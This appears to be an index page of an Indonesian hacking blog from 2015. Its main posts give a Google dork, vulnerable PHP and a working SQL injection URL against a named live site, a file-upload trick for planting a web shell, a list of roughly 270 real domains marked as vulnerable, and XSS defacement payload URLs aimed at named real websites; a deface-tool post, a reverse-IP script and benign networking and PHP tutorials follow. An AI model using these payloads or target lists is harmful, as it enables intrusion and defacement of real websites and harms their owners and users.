Sabtu, 31 Oktober 2015

hack CMS IKLAN BARIS



Assalamu’alaikum wr.wb..
Alhamdulillah bisa aktif lagy di underground hehehe..
Kali ini kk minato ingin mengajak kawan” berpesta sedikit :v .. yuk kita langung aja..
##############SQL CMS IKLAN BARIS#####################
# Dork :: inurl:“kategori.php?premium=” atau di kembangin lagy aja.. ;)
Vulnerable found at kategori.php
$id                          = $_GET['id'];
$id_kategori       = $_GET['kategori'];
$qryISI_kat         = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");
$recISI_kat         = fetch_array($qryISI_kat);


$id_iklan_premium         = $_GET['premium'];
$id_iklan_gratis                                = $_GET['gratis'];

$qryISI_premium             = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");
$recISI_premium             = fetch_array($qryISI_premium);

$qryISI_gratis    = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");
$recISI_gratis     = fetch_array($qryISI_gratis);
Terlihat tdk ada filter disana.. XD
Demo:
vuln column di title,
 http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -
#########arbitrary file upload CMS IKLAN BARIS ###################
File //iklan_gratis.php
                $img = $_FILES['gambar']['type'];
                                $imgtype = strtolower($img);
                                                /* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){
                                                                alert('File gambar tidak dikenali!!!');
                                                } */

NB::Filternya dibuang sama programmernya XD
Demo::

Pasang iklan gratis.. isi box terserah..
Lalu upload file dengan extensi,… shell.php.xxxjpg
Dibawah adalah target yg aku dapatin dr auto scanner ku.. selamat menikmati..lets rock (kita goyang) cms indoesia XD
1. bolamansion.com [NOT_FOUND]

2. afatogel.asia [NOT_FOUND]

3. afapoker.biz [NOT_FOUND]

4. 

5. iklanbet.com [ketemu]

6. iklangroups.com [ketemu]

7. iklansexy.com [NOT_FOUND]

8. iklanpoker.com [ketemu]

9. iklanmurah.net [ketemu]

10. iklan365.com [ketemu]

11. iklanforex.net [ketemu]

12. iklanbitcoin.com [ketemu]

13. iklanword.com [ketemu]

14. iklanbet.com [ketemu]

15. iklangroups.com [ketemu]

16. iklansexy.com [NOT_FOUND]

17. iklanpoker.com [ketemu]

18. iklanmurah.net [ketemu]

19. iklan365.com [ketemu]

20. iklanforex.net [ketemu]

21. iklanbitcoin.com [ketemu]

22. iklanword.com [ketemu]

23. iklanbet.com [ketemu]

24. iklangroups.com [ketemu]

25. iklansexy.com [NOT_FOUND]

26. iklanpoker.com [ketemu]

27. klanmurah.net [NOT_FOUND]

28. iklan365.com [ketemu]

29. iklanforex.net [ketemu]

30. iklanbitcoin.com [ketemu]

31. iklanword.com [ketemu]

32. megaiklan.com [ketemu]

33. mejatangkas.com [ketemu]

34. mentaripoker.us [NOT_FOUND]

35. nagaunik.com [NOT_FOUND]

36. permataiklan.com [ketemu]

37. pokernaga.us [NOT_FOUND]

38. poker228.in [NOT_FOUND]

39. pokerv.net [NOT_FOUND]

40. poker228.info [NOT_FOUND]

41. poker228.asia [NOT_FOUND]

42. poker88plus.com [ketemu]

43. poker88.in [NOT_FOUND]

44. pokerwoles.biz [NOT_FOUND]

45. pokerol.net [NOT_FOUND]

46. samkokbet.info [NOT_FOUND]

47. samkokbet.net [NOT_FOUND]

48. speediklan.com [ketemu]

49. visaiklan.com [ketemu]

50. gamespools.asia [NOT_FOUND]

51. bagusiklan.com [ketemu]

52. serviceiklan.com [NOT_FOUND]

53. pusatpoker.com [NOT_FOUND]

54. mesiniklan.com [ketemu]

55. kucingbirahi.com [NOT_FOUND]

56. karyaiklan.com [ketemu]

57. infotangkas.com [ketemu]

58. iklanbet.com [ketemu]

59. iklangroups.com [ketemu]

60. iklansexy.com [NOT_FOUND]

61. iklanpoker.com [ketemu]

62. iklanmurah.net [ketemu]

63. iklan365.com [ketemu]

64. iklanforex.net [ketemu]

65. iklanbitcoin.com [ketemu]

66. iklanword.com [ketemu]

67. iklanbet.com [ketemu]

68. iklangroups.com [ketemu]

69. iklansexy.com [NOT_FOUND]

70. iklanpoker.com [ketemu]

71. iklanmurah.net [ketemu]

72. iklan365.com [ketemu]

73. iklanforex.net [ketemu]

74. iklanbitcoin.com [ketemu]

75. iklanword.com [ketemu]

76. iklanbet.com [ketemu]

77. iklangroups.com [ketemu]

78. iklansexy.com [NOT_FOUND]

79. iklanpoker.com [ketemu]

80. iklanmurah.net [ketemu]

81. iklan365.com [ketemu]

82. iklanforex.net [ketemu]

83. iklanbitcoin.com [ketemu]

84. iklanword.com [ketemu]

85. iklanbet.com [ketemu]

86. iklangroups.com [ketemu]

87. iklansexy.com [NOT_FOUND]

88. iklanpoker.com [ketemu]

89. iklanmurah.net [ketemu]

90. iklan365.com [ketemu]

91. iklanforex.net [ketemu]

92. iklanbitcoin.com [ketemu]

93. iklanword.com [ketemu]

94. grandiklan.com [ketemu]

95. gejora.com [ketemu]

96. dewarezeki.com [NOT_FOUND]

97. dewamabuk.net [NOT_FOUND]

98. bursajual.com [NOT_FOUND]

99. rimbapoker.us [NOT_FOUND]

100. rgopoker.us [NOT_FOUND]

101. seoiklan.com [ketemu]

102. mejajudi.com [NOT_FOUND]

103. fujiforex.com [ketemu]

104. bejopoker.info [NOT_FOUND]

105. bejopoker.us [NOT_FOUND]

106. bejopoker.info [NOT_FOUND]

107. bejopoker.us [NOT_FOUND]

108. daunpoker.us [ketemu]

109. dewacasino.in [ketemu]

110. dewacasino.asia [NOT_FOUND]

111. dominobet.cc [NOT_FOUND]

112. dominobet.us [NOT_FOUND]

113. dominobet.me [NOT_FOUND]

114. jasapoker.asia [NOT_FOUND]

115. jasapoker.us [ketemu]

116. juaraqq.us [ketemu]

117. juarapoker.us [NOT_FOUND]

118. indoqq.us [NOT_FOUND]

119. juaraqq.us [ketemu]

120. juarapoker.us [NOT_FOUND]

121. lapak303.asia [NOT_FOUND]

122. loginpoker88.com [NOT_FOUND]

123. nagapoker.biz [NOT_FOUND]

124. nagapoker.asia [NOT_FOUND]

125. nagapoker.biz [NOT_FOUND]

126. nagapoker.asia [NOT_FOUND]

127. pokernaga.us [NOT_FOUND]

128. poker228.in [NOT_FOUND]

129. pokerv.net [NOT_FOUND]

130. poker228.info [NOT_FOUND]

131. poker228.asia [NOT_FOUND]

132. poker88plus.com [ketemu]

133. poker88.in [NOT_FOUND]

134. pokerwoles.biz [NOT_FOUND]

135. pokerol.net [NOT_FOUND]

136. pokernaga.us [NOT_FOUND]

137. poker228.in [NOT_FOUND]

138. pokerv.net [NOT_FOUND]

139. poker228.info [NOT_FOUND]

140. poker228.asia [NOT_FOUND]

141. poker88plus.com [ketemu]

142. poker88.in [NOT_FOUND]

143. pokerwoles.biz [NOT_FOUND]

144. pokerol.net [NOT_FOUND]

145. pokernaga.us [NOT_FOUND]

146. poker228.in [NOT_FOUND]

147. pokerv.net [NOT_FOUND]

148. poker228.info [NOT_FOUND]

149. poker228.asia [NOT_FOUND]

150. poker88plus.com [ketemu]

151. poker88.in [NOT_FOUND]

152. pokerwoles.biz [NOT_FOUND]

153. pokerol.net [NOT_FOUND]

154. pokernaga.us [NOT_FOUND]

155. poker228.in [NOT_FOUND]

156. pokerv.net [NOT_FOUND]

157. poker228.info [NOT_FOUND]

158. poker228.asia [NOT_FOUND]

159. poker88plus.com [ketemu]

160. poker88.in [NOT_FOUND]

161. pokerwoles.biz [NOT_FOUND]

162. pokerol.net [NOT_FOUND]

163. pokernaga.us [NOT_FOUND]

164. poker228.in [NOT_FOUND]

165. pokerv.net [NOT_FOUND]

166. poker228.info [NOT_FOUND]

167. poker228.asia [NOT_FOUND]

168. poker88plus.com [ketemu]

169. poker88.in [NOT_FOUND]

170. pokerwoles.biz [NOT_FOUND]

171. pokerol.net [NOT_FOUND]

172. pokernaga.us [NOT_FOUND]

173. poker228.in [NOT_FOUND]

174. pokerv.net [NOT_FOUND]

175. poker228.info [NOT_FOUND]

176. poker228.asia [NOT_FOUND]

177. poker88plus.com [ketemu]

178. poker88.in [NOT_FOUND]

179. pokerwoles.biz [NOT_FOUND]

180. pokerol.net [NOT_FOUND]

181. rgobet.info [NOT_FOUND]

182. rgobet.net [NOT_FOUND]

183. rgobet.us [NOT_FOUND]

184. rgobet.info [NOT_FOUND]

185. rgobet.net [NOT_FOUND]

186. rgobet.us [NOT_FOUND]

187. rgobet.info [NOT_FOUND]

188. rgobet.net [NOT_FOUND]

189. rgobet.us [NOT_FOUND]

190. rgotogel.us [NOT_FOUND]

191. samkokbet.info [NOT_FOUND]

192. samkokbet.net [NOT_FOUND]

193. sayapoker.us [ketemu]

194. togelplus.info [NOT_FOUND]

195. togelplus.net [NOT_FOUND]

196. totojitu.net [NOT_FOUND]

197. totojitu.us [NOT_FOUND]

198. jasapoker.asia [NOT_FOUND]

199. jasapoker.us [ketemu]

200. beritapoker.com [ketemu]

201. idpools.net [ketemu]

202. arwanapoker.us [ketemu]

203. dewacasino.in [ketemu]

204. dewacasino.asia [NOT_FOUND]

205. dewabitcoin.com [NOT_FOUND]

206. dewabatu.com [NOT_FOUND]

207. juraganiklan.com [ketemu]

208. juraganlink.com [ketemu]

209. juraganiklan.com [ketemu]

210. juraganlink.com [ketemu]

211. dewabitcoin.com [NOT_FOUND]

212. dewabatu.com [NOT_FOUND]

213. iklanbet.com [ketemu]

214. iklangroups.com [ketemu]

215. iklansexy.com [NOT_FOUND]

216. iklanpoker.com [ketemu]

217. iklanmurah.net [ketemu]

218. iklan365.com [ketemu]

219. iklanforex.net [ketemu]

220. iklanbitcoin.com [ketemu]

221. iklanword.com [ketemu]

222. mabukpoker.com [NOT_FOUND]

223. iklanbet.com [ketemu]

224. iklangroups.com [ketemu]

225. iklansexy.com [NOT_FOUND]

226. iklanpoker.com [ketemu]

227. iklanmurah.net [ketemu]

228. iklan365.com [ketemu]

229. iklanforex.net [ketemu]

230. iklanbitcoin.com [ketemu]

231. iklanword.com [ketemu]

232. listingbetting.com [NOT_FOUND]

233. pok3r88.com [NOT_FOUND]

234. bisnisgelap.com [ketemu]

235. pokernaga.us [NOT_FOUND]

236. poker228.in [NOT_FOUND]

237. pokerv.net [NOT_FOUND]

238. poker228.info [NOT_FOUND]

239. poker228.asia [NOT_FOUND]

240. poker88plus.com [ketemu]

241. poker88.in [NOT_FOUND]

242. pokerwoles.biz [NOT_FOUND]

243. pokerol.net [NOT_FOUND]

244. bolatangkasplus.com [ketemu]

245. culturalexpertise.com [ketemu]

246. culturacervejeira.com [ketemu]

247. lucchesigalati.com [ketemu]

248. vangeel-ips.com [ketemu]

249. mojotheater.com [ketemu]

250. gmchealth.com [ketemu]

251. bizimaraba.com [NOT_FOUND]

252. dewasurga.com [ketemu]

253. cushingacademylibrary.com [NOT_FOUND]

254. cushingacademy.net [NOT_FOUND]

255. norcatcard.com [ketemu]

256. sourceurban.com [ketemu]

257. internationalpsychoanalysis.org [NOT_FOUND]

258. dawsonstrategic.com [ketemu]

259. iklanbet.com [ketemu]

260. iklangroups.com [ketemu]

261. iklansexy.com [NOT_FOUND]

262. iklanpoker.com [ketemu]

263. iklanmurah.net [ketemu]

264. iklan365.com [ketemu]

265. iklanforex.net [ketemu]

266. iklanbitcoin.com [ketemu]

267. iklanword.com [ketemu]

268. frederictontweets.com [ketemu]

269. bluebuffalohg.com [ketemu]

270. culturalexpertise.com [ketemu]

271. ulturacervejeira.com [NOT_FOUND]

272. diurnalize.com [ketemu]

273. alexavegas.net [ketemu]

 tunggu update selanjutnya yh... bnyk rahasia yg akan kita kaji ^_^ 
salam dr keluarga  Sec7or
Read more

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox 




error.php XSS (Cross Site Scripting) Vulnerabilities


1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only..

2). Now Type your first Tag to Check the vulnerability 
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)


Read more

Jumat, 30 Oktober 2015

Top 5 "Hacker" Friendly Operating Systems


Top 5 "Hacker" Friendly Operating Systems :Hello Everyone !! Most of my readers asked me Which is The Best Operating System for Doing Hacking Activities, such as Hacking websites, Wireless Networks, Passwords, Network Sniffing ,reverse engineering, application hacking and other encrypting and spoofing hacking. So I thought of writing an article on this... Today In this article I will be sharing some informations about awesome Hacking Operating Systems (OS) ;) ...

Top 5 Hacker Friendly Operating Systems 

Here is the list of Top 5 Hacker Friendly Operating Systems about which we are going to discuss.. 
  1. Kali Linux
  2. Backtrck 5
  3. BugTraq
  4. BlackBuntu
  5. DEFT

Top 5 Hacker Friendly Operating Systems 

So lets come to our topic Top 5 Hacker Friendly Operating Systems. Below is the full list of top 5 Hacker friendly operating systems. If you are a Hacker you can use them and if not them can be by using them ;) .. so here it starts! ...

#1 Kali Linux


Kali Linux is based upon Debian Linux, rather than Ubuntu and new streamlined storehouses synchronize with the Debian vaults 4 times each day, continually furnishing clients with the most recent bundle upgrades and security fixes accessible.

With more than 300 penetration testing tools, totally free, Open source, Vast wireless gadget support, GPG marked bundles and repos, Multi-dialect, Completely adaptable make this appropriation one of the best accessible gem of hacking group.

You can Donload Kali Linux From the link given below :)


NOTE: Default root password is same "root" :)

#2 BackTrack 5




Backtrack is a Linux OS intended for security experts. Who manages framework and web application security and different fields, for example, cyber crime scene investigation.

This Operating System includes all the security evaluations and elements till date.This distro got it all,Slick Interface,Powerful yet most recent tools,high perfectly substantial programming library,tons of instructional exercise. 

You can download Backtrack from below link.!



BugTraq offers the most exhaustive dispersion, ideal, steady and programmed security to date. Bugtraq is an appropriation in light of the 2.6.38 part has an extensive variety of infiltration and legal apparatuses. Bugtraq can introduce from a Live DVD or USB drive, the circulation is tweaked to the last bundle, designed and redesigned the portion and the part has been fixed for better execution and to perceive an assortment of equipment, including remote infusion patches pentesting different disseminations don't perceive.

Administrative improvements of the system for better management of services. Extended the scope of acknowledgment for infusion remote drivers. Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

Awesome Scripts from Bugtraq-Team (SVN upgrades devices, erase tracks, indirect accesses, Spyder-sql, and so on.) Stability and performance optimized: Enhanced execution blaze and java and begin cleansing superfluous administrations. So that the client can utilize just the administrations you truly need.  It has consolidated the formation of the client in the establishment, which is made with all framework designs.


4# BlackBuntu



Blackbuntu is dispersion for infiltration testing which was extraordinarily intended for security preparing understudies and professionals of data security. It's presently being assembled utilizing the xubuntu 12.04.This release has an extensive programming library and almost 100000's instructional exercises flying on YouTube and different locales. Blackbuntu keeps running on any PC,new or old,because of its less requirements.The Main developer,Krit Kadnok says "It's made time permitting as a hobby."Get Blackbuntu Here




#5 DEFT (Digital Evidence & Forensic Toolkit.)


DEFT (acronym for Digital Evidence and Forensic Toolkit) is a Xubuntu Linux-based Computer Forensics live CD. It is intended to meet police, agents, framework director and Computer Forensics authority's requirements.

DEFT Linux v5 depends on the new Kernel 2.6.31 (Linux side) and the DEFT Extra 2.0 (Computer Forensic GUI) with the best freeware Windows Computer Forensic instruments. DEFT it's another idea of Computer Forensic live framework that utilization LXDE as desktop environment and thunar document administrator and mount director as instrument for gadget administration.

It is a simple to utilize framework that incorporates an incredible equipment identification and the best free and open source applications committed to episode reaction and PC crime scene investigation.

DEFT is intended to be utilized by:
  • police 
  • examiners 
  • framework executive 
  • people 

and every one of the general population who need to utilize criminological instrument yet don't have the foggiest idea about the open source agent frameworks and the Forensic methods. Get This Swiss Knife of PC world Here

Read more

Selasa, 27 Oktober 2015

Config and Auto Deface in Worpdress

Config and Auto Deface in Wordpress..

ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..

karena semua fitur itu ada di tool ini..
cuma 1x klik...



*nb:
ganti $nick.

klo token ngk ada.. berarti tinggalin aja..
klo token ada + ngk berhasil mepes.. coba lu pake manual..
Read more

Senin, 26 Oktober 2015

Script Auto Reverse IP Lookup With Python

Hai sob ...
Kali ini ane mau bagi script Auto Reverse IP Lookup With Python , jika pake web kan udah biasa tuh gimana kalau pakai script python kan luar biasa :p wkwkw  . Okey lanjut saja ..

Berikut Script nya


import urllib2
import re
import random


#Decoded by DayWalker
#Concat : rafsanzani.suhada99[at]gmail[dot]com
#Caranye
# Target : facebook.com <-- Target 



class reverse(object):
def run(self, target):
print ""
if target.startswith("http://"):
target = target.replace("http://", "")
elif target.startswith("https://"):
target = target.replace("https://", "")
else:
pass

url = "http://viewdns.info/reverseip/?host=%s&t=1" % (target)

try:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent','Mozilla/5.0 (Mobile; rv:14.0) Gecko/14.0 Firefox/14.0')]
response = opener.open(url)
data = response.read()
comp = re.compile("<tr><td>\S+</td><td")
baglantilar = comp.findall(data)

for i in baglantilar:
i = i.replace("<tr><td>", "").replace("</td><td", "")

if i.startswith("http://"):
pass
else:
i = "http://"+i

if "Domain" not in i:
print i

except:
print "Something's went wrong .."
pass


if __name__ == '__main__':
a = raw_input("\n\t Target : ")
reverse().run(a)

print "\n IndoXploit Coders Team"
# Indoxploit Coders Team


SS testing :


Oke Terima kasih :)
DayWalker

Thx To : IndoXploit Coders Team | IDN-Crew | Madura Cyber Team |
Read more

Minggu, 25 Oktober 2015

Tutorial Generate Random String menggunakan PHP Script

Kali ini saya akan share cara membuat random string menggunakan bahasa php. Random string biasa digunakan untuk membuat kode kupn, konfirmasi, random password dll. Oke langsung saja ke tutorial.

1. Random String Berisikan Huruf Kecil dan Angka.

<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?> 
Simpan file tersebut dengan nama random.php .
Selanjutnya buat file lain dengan nama call.php dan isikan kode berikut :
<?php
include "random.php";
   $random = random_string(0);
 print ("$random");
?>

Cara panggilnya :
via terminal linux bisa ketikkan php call.php
Atau bisa juga di run lewat localhost.
Contoh output : rpca6unz
Terdiri dari 8 karakter dengan 7 huruf kecil dan 1 angka.
2. Random String Berisikan Huruf Kecil, Huruf besar, Simbol, dan Angka.
<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 5, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 3, 'characters' => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');
    $character_set_array[] = array('count' => 2, 'characters' => '0123456789');
    $character_set_array[] = array('count' => 2, 'characters' => '!@#$+-*&?:');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?>
Simpan dengan mana random.php lalu buat file call.php seperti nomor 1.
Contoh Output : q#Q?w22kaZfC
Terdiri dari 12 karakter dengan 5 huruf kecil, 3 huruf besar, 2 angka, dan 2 simbol.
Mudah bukan ?
Script diatas masih bisa dikembangkan sesuai kebutuhan, misal output hanya berupa simbol dan angka, huruf besar dan angka, dll.

Sekian tutor kali ini dan semoga bermanfaat.

Credit : Linux and Security
Read more

Kamis, 22 Oktober 2015

Cara Melihat Port Web Yang Terbuka Dengan PortScanner (Perl)

Hai Sob..
Kali ini saya akan share cara melihat port web yang terbuka dengan PortScanner (Perl) , Apa sih fungsinya ? kalau menurut saya sih fungsi nya kita bsa melihat port yang terbuka , contoh port 22 ? nah ini port 22 itu SSH , jadi kita bisa meromote web itu dengan ssh , ada juga yang 23 21 dll .


Toolsnya sedot DISINI UNTUK AMBIL

Pada bagian :
$ip = "localhost" ganti localhost dengan website(target) 

Ini hasil nya : 

Untuk ingin mengetahui nama nama portnya search aja ke google :p
Read more

Jumat, 16 Oktober 2015

Spannig Tree Protocol (IEEE 802.1d)

Pengertian Spanning Tree Protocol (STP)
Pengertian Spanning Tree Protocol (STP) sesuai dengan fungsi dari STP itu sendiri, yaitu dengan tugas utamanya untuk mencegah terjadinya network loops yang terjadi pada layer 2 (device Switch maupun Bridge). STP dengan konstan selalu memonitoring network untuk menemukan links dan memastikan supaya tidak terjadi loops dengan menutup links yang redundant (berlebihan).

Spanning Tree Protocol Operation
STP Konsep
  • STP menemukan semua links pada network dan menutup links yang redundant. STP benar-benar memastikan/mencegah terjadinya network loops dengan memilih salah satu Switch sebagai root-bridge. Root-bridge port dinamakan designated port (Forwarding-state port). Forwarding-state port bertugas menerima dan mengirim (meneruskan) traffic.
  • Setelah salah satu switch ditentukan sebagai root-bridge maka yang lain bertindak sebagai non-root bridge. (lihat gambar diatas)
  • Kemudian port (yang berada di switch non-root bridge) yang mempunyai nilai cost terkecil (yang ditentukan oleh bandwidth link) dan terhubung ke port root-bridge (designated port) dinamakan root port (juga bertugas meneruskan traffic).
  • Port yang telah ditentukan dan memiliki nilai path-cost paling kecil ke root-bridge dinamakan designated port. Port lain atau port yang berada di jalur yang sama dianggap non-designated (tidak meneruskan traffic) dan dinamakan blocking mode. (lihat gambar diatas)
Memilih Root Bridge
Switch maupun Bridge menjalankan pertukaran informasi STP dengan BPDUs (Bridge Protocol Data Units). BPDUs mengirim pesan konfigurasi menggunakan multicast frame. Bridge ID dari setiap device mengirim ke device lainya menggunakan BPDUs. 

Bridge ID digunakan untuk menentukan Root-bridge dan Root-port. Bridge ID panjangnya 8-byte didalamnya termasuk priority dan MAC address dari masing-masing device.

Untuk menentukan Root-bridge, priority dan MAC address device digabung. Jika kedua switch mempunyai nilai priority yang sama, maka MAC address lah yang digunakan untuk menentukan, yaitu dengan memilih salah satu switch yang mempunyai nilai ID MAC yang paling kecil.
Contoh: Pada topologi ada dua buah switch, masing-masing memiliki identitas SW 1 dan SW2. Keduanya memiliki priority yang sama yaitu 32768, maka untuk menentukan root-bridge kita menggunakan MAC Address. Disini SW1 memiliki nilai MAC address: 0000.0c00.1111.1111 dan SW2 nilai MAC addressnya: 0000.0c00.2222.2222 . Maka yang bertindak sebagai root-bridge adalah SW1 karena memiliki nilai ID MAC yang lebih kecil daripada SW2.
Memilih Designated Port
Untuk menentukan port yang akan digunakan untuk komunikasi dengan root-bridge, terlebih dahulu kita harus mengetahui apa itu path-cost. STP cost merupakan total akumulasi path-cost berdasarkan pada bandwidth pada links. Untuk menentukan designated port silahkan baca lagi pada penjelasan diatas. 

Cost STP

Spanning-Tree Port States
Port pada switch maupun bridge menjalankan STP transisi melalui 4 states yang berbeda:
  1. Blocking maksudnya tidak mem-forward frames. Semua port switch blocking state secara  default ketika switch hidup.
  2. Listening maksudnya listen BPDUs untuk memastikan tidak ada loop pada network sebelum melewati data frames.
  3. Learning maksudnya learn MAC addresses dan membuat tabel filter tetapi tidak mem-forward frames.
  4. Forwarding maksudnya mengirim dan menerima semua data pada bridged port.
Biasanya, port switch itu menggunakan blocking dan forwarding states. Forwarding port ditentukan yang mana port tersebut mempunyai nilai cost terkecil ke root-bridge. Namun. jika topologi jaringanya berubah karena dari salah satu link switch failed (gagal) atau pihak administrator menambahkan switch pada topologi tersebut maka port switch akan melakukan listening dan learning states.

Blocking ports digunakan untuk mencegah terjadinya loop pada network. Kadang sebuah switch menentukan best-path ke root-bridge, kemudian semua port lain akan blocking states hingga port yang ter-blocking states menerima BPDUs.

Jika sebuah switch menentukan bahwa port ter-blocking states maka harus ada yang menjadi designated port, kemudian switch akan melakukan listening state. Setelah itu switch akan mengecek BPDUs untuk memastikan bahwa switch tidak membuat sebuah loop sesekali port forwarding states.

Convergence
Convergence terjadi ketika switch/bridge teralihkan dari forwarding atau blocking states lain. Tidak ada data yang di forward selama kejadian ini. Convergence penting untuk memastikan semua device mempunyai database yang sama. Sebelum data di forward, semua device harus telah ter-upadted. Kejadian ini membutuhkan waktu 50 detik, dari blocking hingga forwarding states. Direkomendasikan untuk tidak mengubah default timer STP (tetapi timer bisa disesuaikan jika perlu).
Forward delay adalah waktu untuk mengalihkan sebuah port dari listening atau dari learning ke Forward states.

STP Example
STP


Read more